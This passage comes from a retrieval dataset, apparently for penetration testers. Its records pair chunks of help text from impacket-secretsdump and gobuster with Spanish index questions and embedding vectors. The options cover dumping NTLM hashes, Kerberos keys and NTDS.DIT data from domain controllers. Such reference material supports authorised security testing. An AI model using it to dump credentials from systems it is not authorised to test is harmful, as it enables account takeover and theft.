-use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "con que puedo leer archivos NTDSDIT y secretados de forma remota?", "v": [-0.09858, -0.17843, -0.09669, -0.06654, 0.08659, 0.01245, -0.11485, 0.12103, -0.03749, 0.16344, -0.09366, -0.169, 0.10838, -0.12836, 0.00188, -0.06138, 0.12897, -0.00938, 0.09039, -0.05867, -0.0035, -0.17635, 0.01058, -0.0266, 0.04702, -0.05554, 0.11072, 0.16267, -0.06344, 0.1136, -0.09785, 0.00534, -0.04818, 0.00361, -0.08082, 0.02776, 0.02574, 0.11897, -0.06726, 0.05426, 0.04644, 0.17216, -0.026, 0.10719, 0.1311, -0.08169, -0.03815, -0.01864, 0.03609, -0.10481, -0.1085, -0.01886, -0.03165, -0.02584, -0.03606, -0.05235, 0.14424, -0.06849, -0.02312, 0.0748, -0.06677, -0.01522, -0.04362, -0.05097, -0.04477, -0.17649, 0.06195, 0.03937, -0.0935, 0.0575, -0.0191, -0.02283, 0.01741, -0.01665, -0.10583, 0.02416, -0.08832, -0.0261, -0.02735, 0.0062, 0.0072, -0.03293, -0.11203, -0.00678, -0.09315, -0.11081, -0.05227, 0.04835, -0.07144, -0.09978, 0.0882, 0.00458, -0.04659, -0.00746, 0.07711, -0.04785, 0.03015, 0.01256, -0.13546, -0.09085, 0.00038, 0.0437, -0.00055, 0.14718, -0.06363, 0.0913, 0.02321, 0.03532, 0.02448, -0.01421, 0.12473, 0.05407, 0.02302, 0.04954, -0.01344, -0.01309, -0.00153, -0.01603, 0.04341, -0.00048, -0.04705, 0.01992, -0.01411, 0.00314, 0.05829, 0.00162, -0.00571, 0.03482, -0.06021, -0.0016, 0.00628, -0.02237, -0.05215, 0.00805, 0.02637, -0.03249, -0.03471, 0.02661, -0.06123, -0.09177, 0.1353, -0.01249, 0.02136, 0.04142, 0.10569, 0.01029, 0.00759, -0.06898, -0.00146, -0.06154, 0.00574, -0.01198, 0.04134, -0.05832, -0.06687, 0.02212, 0.00629, -0.05755, -0.03363, 0.06092, -0.07978, 0.08254, -0.07969, -0.01146, -0.03143, -0.0898, 0.00678, -0.04646, -0.00379, -0.07573, -0.04294, -0.00217, -0.02717, -0.01057, 0.03761, -0.01375, 0.07165, -0.09621, 0.01901, -0.09745, -0.01861, 0.02449, 0.02261, 0.00355, 0.02561, -0.02185, 0.05164, -0.04881, -0.05811, -0.02574, 0.03378, 0.00723, -0.0569, -0.00253, -0.04231, -0.02417, -0.05662, 0.02599, 0.07702, -0.02384, -0.02048, -0.04134, -0.00739, -0.00633, 0.01161, 0.0208, -0.03253, 0.08042, -0.04954, 0.03249, 0.0983, -0.07807, 0.0472, -0.07154, -0.00537, 0.00197, -0.01428, -0.03062, -0.04476, 0.03667, -0.00979, 0.05374, 0.09093, -0.01316, 0.0603, 0.0095, 0.03973, 0.03974, -0.00925, -0.00311, -0.01186, 0.05261, -0.00292, 0.01959, 0.01606, 0.00221, -0.02275, 0.01109, -0.02183, -0.00945, 0.01908, 0.09908, 0.02436, -0.04046, 0.00453, -0.06535, -0.04502, 0.02824, 0.03319, -0.05484, -0.00465, -0.01823, -0.01009, 0.00344, -0.00375, 0.00316]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "que herramienta sirve para extraer solo hashes de NTLM del archivo NTDS.DIT?", "v": [-0.04467, -0.15638, -0.03971, -0.11974, 0.08405, -0.05309, -0.16221, 0.09402, -0.02341, 0.22669, -0.0916, -0.0793, 0.01263, -0.10073, -0.03503, -0.02853, 0.10963, -0.17451, 0.05203, -0.00025, -0.10277, -0.02479, -0.11758, -0.05247, -0.02562, -0.07098, -0.05746, 0.07653, -0.23942, 0.19363, -0.06828, -0.02064, -0.09208, -0.00126, -0.01659, -0.05351, 0.01867, 0.04525, -0.03606, 0.07913, 0.08897, 0.18669, -0.07631, 0.15069, 0.03637, -0.09703, -0.05156, -0.01431, 0.10767, -0.09184, 0.00724, 0.00398, -0.09201, -0.0328, -0.01946, -0.11466, 0.13425, -0.10321, -0.03194, -0.00509, -0.09553, -0.01053, -0.05552, -0.14237, -0.08386, -0.13469, 0.05903, -0.00595, -0.08821, 0.03551, -0.16734, 0.07726, 0.1357, -0.07431, -0.07449, -0.02072, -0.0369, -0.01625, -0.01195, 0.05349, 0.06051, -0.07671, -0.05009, -0.01206, -0.13994, -0.05262, 0.02634, -0.00475, -0.00394, -0.05287, 0.05928, 0.0526, 0.0026, -0.02695, 0.09356, -0.09864, 0.04505, 0.0358, 0.01819, -0.04866, 0.09507, -0.07369, 0.00202, 0.07599, -0.05592, 0.01748, 0.04444, 0.04293, -0.05171, 0.03272, 0.13286, 0.00393, 0.03529, 0.05317, -0.01622, 0.0465, -0.01392, -0.00526, -0.03687, -0.01781, 0.03692, 0.0172, 0.02722, 0.02699, -0.01734, -0.02368, -0.03083, 0.06135, -0.05949, -0.08176, 0.03521, -0.03987, -0.06591, 0.04302, 0.03835, -0.04383, 0.03151, -0.01839, -0.00774, -0.08406, 0.0864, 0.02315, -0.02108, 0.01501, 0.06939, 0.02, -0.00636, -0.01948, 0.01623, -0.06067, 0.13103, -0.06033, 0.00887, -0.03123, -0.05868, 0.01933, 0.01334, 0.02572, -0.14052, 0.04123, -0.03783, -0.00864, 0.0221, 0.04607, 0.00977, -0.0172, 0.0308, -0.02399, 0.03645, -0.03605, 0.03879, -0.03832, 0.01849, -0.05245, -0.01858, -0.04933, 0.03908, -0.04348, 0.00621, -0.07276, -0.00623, 0.00675, 0.039, -0.00395, 0.00913, -0.05816, 0.053, -0.03263, -0.03792, -0.01577, -0.00264, 0.05029, -0.04472, -0.03987, 0.00542, 0.01548, -0.01903, -0.04729, 0.03771, 0.01672, -0.04557, -0.01056, -0.00527, -0.03429, 0.01029, 0.06728, -0.04711, 0.01712, -0.04428, 0.0106, 0.07291, 0.03944, 0.02528, -0.02327, -0.03893, -0.00771, 0.02381, 0.04014, -0.00544, 0.00894, -0.02938, 0.01543, 0.04105, -0.00777, 0.00727, -0.02036, 0.026, 0.03548, 0.00338, -0.01799, 0.03142, 0.04138, -0.00383, 0.01284, 0.01554, -0.02562, 0.00906, 0.03461, -0.00664, -0.04365, 0.02176, 0.01831, 0.00071, -0.01614, 0.00236, -0.02312, 0.0009, 0.01061, 0.01515, -0.05031, -0.0102, -0.0634, 0.0251, 0.02566, -0.01519, 0.00077]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "cual es una alternativa libre para ver si un usuario estΓ‘ deshabilitado en Active Directory?", "v": [-0.12421, 0.0997, -0.12638, -0.02194, -0.03355, -0.01778, -0.12959, -0.11501, -0.12459, -0.04001, 0.06289, -0.27394, -0.10625, 0.00572, 0.06449, -0.1237, 0.07541, -0.11952, 0.01778, -0.02226, -0.02177, 0.02781, -0.08266, -0.00499, 0.05568, -0.00704, -0.00223, -0.0122, -0.03567, 0.02648, 0.06534, -0.01425, 0.06132, -0.07253, 0.0878, 0.02269, 0.01203, 0.04955, 0.14182, 0.04865, -0.01747, 0.07389, -0.07216, 0.04275, 0.00839, 0.09468, -0.04716, -0.10553, 0.00776, 0.17556, -0.11607, -0.02104, -0.12981, 0.02345, 0.15836, -0.01522, 0.09759, -0.17021, -0.05498, -0.09256, -0.08817, -0.01987, -0.01173, 0.00854, -0.07064, -0.04145, 0.02012, 0.0175, -0.11207, 0.11655, 0.04526, -0.04143, 0.01958, 0.07356, -0.08545, 0.07257, -0.00776, -0.03552, -0.08043, 0.08268, 0.03785, -0.08675, 0.01126, 0.03732, -0.16778, -0.13508, 0.12726, -0.13313, 0.02186, 0.00967, 0.09151, 0.08176, -0.00965, 0.0643, -0.01826, -0.02976, 0.00772, 0.10919, 0.04471, 0.04608, 0.03115, 0.0742, -0.01565, 0.07916, 0.00696, -0.01619, -0.00382, 0.07254, -0.13788, 0.01722, 0.00329, -0.00701, -0.01557, -0.04279, 0.02549, 0.11692, -0.09408, -0.05465, -0.00903, 0.02638, -0.08205, -0.03721, 0.00765, -0.09153, 0.07035, 0.04182, 0.01764, 0.03899, -0.06738, 0.05904, 0.01202, 0.03166, -0.04227, -0.16725, -0.09825, -0.00759, 0.02706, 0.00587, 0.05513, -0.02053, 0.00819, -0.02671, 0.02752, 0.03104, 0.02872, -0.06346, 0.01248, 0.00349, -0.03865, 0.0186, -0.05905, 0.01606, 0.00771, 0.07055, -0.00676, 0.07902, -0.05679, -0.01948, -0.04351, 0.05852, 0.03908, -0.01997, -0.01146, -0.02393, -0.01352, -0.02941, -0.082, -0.0647, -0.0327, 0.05709, -0.02487, 0.09296, 0.05781, -0.0705, 0.03119, -0.0884, 0.01194, -0.03562, 0.03993, -0.0121, 0.0148, 0.0067, -0.07961, -0.00233, 0.00178, -0.06195, 0.01842, -0.0295, 0.02979, 0.00179, -0.02118, 0.06796, -0.04637, -0.07897, -0.03363, -0.0336, -0.00122, -0.03492, -0.04997, -0.07947, -0.02772, 0.00638, -0.00097, -0.0182, -0.01577, -0.00477, -0.03417, 0.07384, 0.04319, 0.01873, 0.00587, 0.03111, 0.10419, 0.04322, -0.08784, -0.03426, 0.01868, -0.03091, -0.0215, -0.03569, 0.01874, 0.03558, 0.00337, 0.00227, 0.01203, 0.02162, 0.0109, 0.00257, -0.03347, 0.03108, 0.01443, -0.02144, 0.00919, -0.00444, 0.01901, 0.02887, 0.03149, 0.03314, 0.01114, -0.05539, 0.04756, 0.07563, -0.01441, 0.00523, -0.02428, 0.00499, -0.05803, 0.02652, -0.05088, -0.08284, -0.01396, 0.01964, 0.04247, -0.0449, -0.00594, -0.00118]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "como accedo a la informaciΓ³n de claves Kerberos y hashes de NTLM sin mostrar todo el contenido?", "v": [-0.1086, -0.16669, 0.02275, -0.02129, 0.11419, -0.17631, -0.15997, 0.16144, -0.05622, 0.01437, -0.11232, -0.00899, -0.05415, -0.05006, 0.17695, 0.1194, 0.02615, -0.18118, 0.03535, 0.09146, -0.00271, -0.04186, -0.20326, -0.01742, -0.12466, -0.11124, -0.02918, 0.06714, -0.12216, 0.05686, -0.13186, -0.06684, -0.05691, 0.07041, 0.05891, 0.04173, -0.04594, 0.10353, -0.08583, 0.1074, 0.01534, 0.11631, -0.03525, 0.10914, 0.0222, -0.12046, -0.0518, 0.01747, 0.11221, -0.14632, 0.03407, -0.02437, -0.16444, -0.16044, -0.0421, -0.08752, 0.13001, 0.01889, -0.01989, -0.03752, -0.05134, -0.00114, 0.00371, -0.07193, -0.07563, -0.12511, 0.03214, 0.07115, 0.01167, 0.05638, -0.10225, 0.06552, 0.08536, 0.00228, 0.03246, 0.04263, 0.00484, 0.00939, -0.03892, 0.19632, 0.04713, -0.06574, -0.0332, 0.00841, -0.13179, -0.07797, 0.09241, -0.0041, -0.06865, -0.04986, 0.10488, 0.0684, 0.06763, 0.01381, 0.03691, -0.0309, -0.06333, -0.04335, 0.03878, -0.01785, 0.00418, -0.03593, -0.03372, 0.07553, -0.0129, 0.04524, -0.00841, -0.00752, 0.00716, 0.0217, 0.0331, 0.01282, -0.07017, -0.05779, -0.04659, 0.05075, -0.01226, -0.04139, -0.04052, -0.03803, -0.05395, 0.01972, 0.09821, -0.00529, -0.01968, 0.00591, -0.0035, 0.04724, 0.00067, 0.00697, 0.04677, 0.0143, -0.02266, -0.00023, 0.05925, 0.0295, -0.07945, -0.01173, -0.02488, -0.03188, 0.0483, 0.03801, 0.01933, 0.03653, 0.06562, -0.03635, 0.02719, -0.00834, -0.06821, 0.03565, -0.00294, -0.00345, 0.0065, -0.02557, -0.00939, -0.00303, -0.00196, -0.04883, -0.06428, 0.04879, -0.02211, -0.02476, -0.05371, 0.0715, 0.05449, 0.00724, -0.03992, 0.00652, -0.00475, 0.03067, -0.00914, 0.02807, 0.00604, -0.06089, -0.02884, -0.06486, 0.05036, -0.05027, -0.12262, -0.03278, 0.01757, 0.01064, 0.00755, 0.02319, -0.00189, -0.04224, 0.01812, 0.00224, -0.06921, -0.03954, 0.02504, 0.01156, -0.05412, 0.01491, 0.0182, -0.01629, -0.04122, -0.03344, 0.04822, 0.00839, -0.05167, 0.00128, 0.06052, -0.00275, 0.03237, 0.05778, -0.07595, 0.027, -0.06155, 0.02515, 0.09127, -0.039, 0.01404, -0.06442, -0.06655, 0.01449, -0.00896, 0.02708, -0.04607, 0.05669, 0.02449, 0.08306, 0.0032, -0.02569, 0.03654, -0.03059, 0.04128, 0.05177, 0.03104, 0.01306, -0.04376, 0.03153, -0.02674, 0.04926, 0.02458, -0.01009, -0.02512, 0.0428, -0.03203, -0.07993, 0.02264, 0.01036, 0.0228, -0.01328, 0.02037, -0.02548, -0.09176, 0.0317, 0.01061, -0.00037, 0.00949, -0.0307, -0.00864, -0.00369, -0.03025, -0.0431]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "que herramienta sirve para crucear hashes NTLM?", "v": [0.01787, -0.1639, -0.12856, -0.1037, 0.05992, -0.17258, -0.17814, 0.099, 0.04081, 0.10372, -0.07537, 0.02886, 0.10577, -0.0098, 0.04031, 0.04525, -0.05018, -0.1142, 0.02292, 0.07739, -0.08352, -0.02524, -0.17286, -0.04621, -0.15064, -0.12144, -0.04709, -0.05373, -0.16057, 0.0604, -0.06499, 0.00444, -0.05929, 0.0316, 0.01612, -0.06245, -0.04004, -0.02785, 0.01427, 0.13601, 0.04196, 0.18599, 0.00206, 0.04259, 0.038, -0.09951, -0.04503, -0.04881, 0.02677, -0.05561, 0.0227, -0.0826, -0.20149, -0.07527, -0.02171, -0.06261, 0.16767, -0.01669, -0.06326, -0.12281, -0.09089, -0.04992, -0.05773, -0.16072, -0.10342, -0.02009, 0.01539, -0.06279, -0.03892, 0.01715, -0.08736, 0.03939, 0.10389, -0.12041, -0.05775, -0.00336, 0.01977, 0.08317, 0.06575, 0.01304, 0.15602, -0.06727, -0.06402, -0.06057, -0.07317, -0.02877, 0.0722, 0.03634, 0.05947, -0.01473, 0.03596, 0.06788, 0.01649, 0.01312, 0.09392, -0.03555, 0.04405, -0.04387, 0.03155, -0.0151, 0.18478, -0.0783, -0.0441, 0.05638, -0.07006, 0.00163, 0.03632, 0.01151, -0.02162, 0.01444, 0.15481, -0.02683, -0.00986, 0.0192, -0.00951, 0.08708, -0.0031, -0.01565, -0.01844, -0.01814, 0.05007, 0.04268, -0.03028, 0.08074, -0.00837, -0.01358, -0.03016, 0.07643, -0.04329, -0.09229, 0.01392, -0.05854, -0.05021, 0.0433, -0.00019, -0.04017, 0.03147, -0.11622, 0.026, -0.05725, 0.08888, 0.04604, -0.04955, -0.07567, 0.01908, 0.0253, 0.04457, -0.06551, 0.03257, -0.04566, 0.10195, -0.05753, -0.02651, 0.00171, 0.00355, -0.04112, -0.00896, 0.0368, -0.16269, 0.0742, -0.02628, -0.05172, 0.06846, 0.04591, -0.0007, -0.0045, 0.05576, 0.03569, 0.03117, 0.05658, 0.03015, -0.02246, 0.074, -0.01836, 0.011, -0.06465, 0.00063, 0.02918, -0.03086, -0.09788, 0.02528, -0.0173, -0.01113, -0.02002, 0.03802, 0.00076, 0.00509, 0.00281, -0.00673, -0.00434, -0.02551, 0.01267, -0.03336, -0.07928, 0.0297, 0.04165, 0.00368, -0.06471, 0.0481, -0.02079, -0.02749, -0.00047, -0.01634, -0.02904, 0.04012, 0.08028, -0.03612, -0.0035, -0.0018, 0.01886, 0.01895, 0.03214, -0.00325, 0.00802, -0.02224, -0.03817, -0.0001, 0.02578, 0.01787, -0.02187, -0.00422, 0.0077, 0.01995, 0.01116, 0.02008, 0.01245, -0.00887, 0.00389, 0.00389, -0.03349, 0.04071, -0.02561, -0.00586, 0.01422, -0.0217, -0.0578, -0.02818, 0.03387, -0.00261, -0.0596, -0.00673, 0.03355, -0.01917, -0.01175, 0.00886, -0.04581, 0.00926, -0.03132, -0.00858, -0.02389, -0.02882, -0.02029, 0.029, 0.04003, -0.0235, -0.00824]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "con que puedo hacer autenticaciΓ³n Kerberos sin contraseΓ±a?", "v": [0.00238, -0.01297, -0.08826, -0.00433, 0.02081, -0.10843, 0.02331, 0.08883, -0.114, -0.09351, -0.02474, 0.05233, 0.04311, -0.07183, 0.10511, 0.05049, 0.05584, 0.06441, 0.14896, 0.13213, 0.14983, -0.03487, 0.03999, -0.05121, 0.00695, -0.05776, 0.04095, 0.01952, -0.01377, -0.06864, -0.03207, 0.04959, 0.0518, 0.0593, 0.05146, 0.18847, -0.07389, 0.16845, 0.09597, 0.11273, 0.10184, 0.12785, 0.01609, 0.20553, -0.02827, 0.0901, 0.0579, 0.01675, 0.07431, 0.00161, -0.08038, -0.10102, -0.0829, -0.10592, -0.0909, -0.11469, 0.19336, -0.03138, 0.0318, -0.00377, -0.06774, 0.00285, -0.00709, 0.11187, -0.06248, -0.11372, 0.10453, -0.00526, 0.01373, 0.06484, 0.01124, -0.00542, -0.04595, 0.04118, 0.01344, 0.01443, 0.0098, -0.02986, 0.02344, 0.14968, -0.07644, -0.0017, 0.10414, -0.02686, -0.03734, -0.04915, 0.01886, -0.0482, 0.09111, -0.13687, 0.06617, -0.01484, 0.00726, -0.00386, -0.00021, -0.07348, -0.08684, 0.00993, -0.11579, -0.05851, -0.02009, -0.02427, -0.02646, 0.10758, 0.01955, -0.008, -0.02847, 0.03071, 0.04161, -0.07805, 0.00612, -0.01489, -0.09069, -0.06378, -0.0235, 0.0364, -0.10471, -0.09365, 0.0323, 0.05688, -0.07715, -0.11367, -0.00386, -0.05787, 0.03209, 0.05956, 0.0138, 0.09624, -0.03193, -0.0513, 0.01513, 0.02311, -0.00976, -0.00684, -0.02127, 0.04374, -0.08373, -0.14663, -0.09564, 0.00541, 0.00692, 0.02306, 0.03445, -0.03948, 0.03108, 0.0502, -0.0189, -0.0418, -0.10455, -0.00033, -0.02264, 0.05508, -0.01, 0.08667, 0.00701, 0.04319, -0.01281, -0.06941, 0.03213, 0.1077, -0.04088, -0.00548, -0.03738, 0.05766, -0.08525, -0.02296, 0.008, 0.03492, 0.02466, 0.05948, -0.00789, 0.0957, 0.04988, -0.01221, 0.02986, 0.01499, 0.06406, -0.05245, -0.01752, -0.08937, 0.00911, -0.07292, 0.00718, -0.03683, 0.0256, -0.03405, 0.07541, -0.02987, -0.02776, 0.01379, 0.05271, -0.02242, -0.02297, 0.09436, -0.00584, -0.01175, 0.01107, -0.0361, 0.00891, -0.03261, -0.01961, -0.00604, 0.01927, -0.04011, 0.08682, 0.04119, -0.10176, -0.01626, -0.04823, 0.01014, 0.03584, -0.04514, 0.04241, -0.10063, -0.05997, -0.03359, 0.00102, 0.01849, -0.08802, 0.00938, 0.05493, 0.06172, 0.06268, 0.07028, 0.04575, 0.00363, 0.00079, 0.00601, -0.01178, -0.00836, -0.05406, 0.04939, -0.04574, 0.03581, 0.12054, 0.02175, -0.05355, -0.03298, -0.04811, -0.01381, -0.02262, -0.00074, 0.02004, -0.05433, -0.05835, -0.00228, -0.05754, 0.01167, 0.01261, -0.01078, -0.0591, -0.03512, 0.015, 0.00524, 0.02479, -0.02765]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "como uso la opciΓ³n de no pedir contraseΓ±a en un ataque?", "v": [0.00585, 0.08674, -0.20077, -0.16467, -0.06171, -0.04698, -0.00428, -0.09486, -0.05309, -0.02078, 0.04569, -0.06513, -0.02625, -0.03857, -0.02777, -0.09573, 0.1211, 0.0369, 0.13582, 0.0156, -0.03826, -0.00868, 0.01333, 0.04243, -0.08296, 0.06505, 0.03832, 0.03116, -0.09529, -0.0852, -0.00496, -0.09669, 0.00784, 0.02327, 0.03688, 0.09865, -0.00752, 0.07682, 0.10496, 0.14515, 0.02132, 0.03377, -0.18487, 0.07392, 0.03144, 0.06331, 0.01522, 0.11729, 0.07613, 0.01887, -0.01083, -0.07767, -0.12554, -0.05009, -0.03416, -0.04422, 0.15658, -0.09638, 0.03037, -0.02706, -0.11889, 0.00389, 0.03571, 0.05345, -0.02765, -0.08364, -0.02181, 0.04919, -0.05426, 0.04484, -0.00058, -0.03927, -0.13634, 0.05479, 0.0404, 0.00335, 0.04428, 0.04734, 0.08499, 0.05495, -0.03342, -0.0288, -0.03022, -0.01208, -0.1346, -0.03283, 0.1047, -0.05073, 0.00019, -0.04684, 0.08945, -0.01349, -0.04064, -0.00893, -0.0276, -0.09629, -0.05559, -0.02714, -0.04388, -0.02068, 0.05497, -0.02428, -0.04147, 0.11422, 0.00975, -0.06245, -0.0171, -0.07452, -0.00889, -0.17589, -0.01954, -0.03625, -0.04336, -0.07827, -0.02174, -0.08337, -0.08503, -0.11422, -0.0133, 0.05435, -0.09026, -0.07362, 0.05, 0.04558, 0.00615, 0.03909, -0.03719, -0.02522, -0.10008, -0.05212, -0.02462, -0.02901, 0.02063, -0.00923, -0.03723, 0.05634, -0.02635, -0.13122, -0.10061, 0.02706, 0.01992, 0.06622, 0.01458, -0.06601, 0.05833, 0.0272, 0.0212, -0.03496, -0.13788, 0.05551, -0.03028, -0.01703, 0.00514, 0.0782, -0.04824, 0.04293, -0.02745, -0.08319, -0.02739, 0.1552, -0.03694, -0.03869, -0.07306, 0.1044, -0.10917, -0.09693, -0.00938, -0.05363, 0.0508, 0.01106, 0.01307, 0.0542, -0.03022, -0.01901, -0.03669, -0.06185, -0.01033, -0.02906, 0.00112, -0.03266, -0.0293, -0.05373, -0.08259, 0.012, 0.00509, -0.0688, 0.07812, 0.01673, -0.00894, 0.01499, 0.0005, 0.06318, 0.01205, 0.11346, -0.00663, -0.05694, -0.0777, -0.00573, -0.0018, -0.023, -0.02471, -0.0023, -0.0692, -0.06018, 0.11294, 0.03374, -0.09885, -0.02592, -0.06531, 0.02039, 0.02766, -0.04623, 0.08642, -0.03838, -0.08704, -0.0518, 0.03611, 0.03784, -0.04013, -0.00575, 0.06196, 0.06217, 0.04005, 0.04701, 0.01697, -0.04959, -0.03087, -0.01929, 0.00595, 0.02451, -0.04752, 0.00443, -0.03691, -0.02757, 0.09844, -0.02041, 0.01602, -0.05068, -0.09262, -0.04501, -0.02176, 0.04874, -0.01755, -0.06166, -0.03973, -0.03179, -0.09682, 0.06503, 0.00939, -0.03066, -0.05104, 0.00741, 0.00367, -0.01152, 0.03581, -0.00628]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "con quΓ© programa puedo hacer enumeraciΓ³n de directorios y subdominios?", "v": [-0.16836, 0.04889, -0.04561, -0.02516, 0.09024, 0.01044, 0.0973, -0.00922, -0.16531, -0.08758, -0.0443, -0.01794, -0.0419, -0.2917, -0.01984, -0.06053, 0.19585, -0.05507, -0.01984, 0.01135, 0.0211, -0.02837, -0.09843, 0.005, 0.01193, -0.02581, -0.02001, 0.04244, -0.03462, 0.01519, 0.04339, -0.04375, 0.11743, -0.15258, -0.04351, -0.00163, 0.056, -0.00384, 0.01609, 0.12501, 0.01028, 0.03338, -0.11516, 0.02643, -0.05493, -0.04671, 0.02431, -0.01968, 0.02221, -0.18029, -0.04713, 0.0213, 0.08494, -0.08319, 0.03439, -0.10017, 0.02147, -0.16992, 0.04381, 0.03656, 0.03446, -0.04883, 0.06544, 0.05643, 0.0266, 0.0036, 0.03432, -0.03517, -0.03976, 0.07585, -0.05948, -0.02561, 0.04733, 0.05637, -0.00887, 0.03765, -0.04721, -0.01371, -0.04483, -0.02013, -0.07275, 0.0063, 0.10653, 0.06035, -0.12087, -0.08464, -0.03119, -0.02485, -0.02593, -0.12358, 0.06884, 0.03508, 0.01229, 0.04727, 0.1298, -0.00815, 0.01643, 0.07006, -0.0327, 0.0362, 0.05539, -0.03929, -0.16255, 0.20785, 0.02261, 0.10407, -0.0002, -0.01327, -0.10148, 0.0846, 0.04095, -0.03464, -0.0705, -0.05941, -0.12092, -0.01209, -0.14608, 0.06387, 0.09728, -0.01961, -0.00967, 0.0363, -0.07728, 0.04847, 0.04318, 0.00648, 0.02034, 0.1426, -0.03192, 0.0679, 0.05177, 0.04614, -0.0279, -0.07795, -0.07122, -0.08038, 0.06534, -0.00198, 0.075, -0.05891, -0.00023, 0.04583, 0.04431, 0.06734, -0.00387, -0.07409, -0.00397, -0.08862, -0.03496, -0.00053, 0.04525, 0.03689, -0.02766, 0.00959, 0.0015, -0.04273, 0.08539, 0.02181, -0.01791, 0.05287, -0.01997, -0.00993, -0.02791, 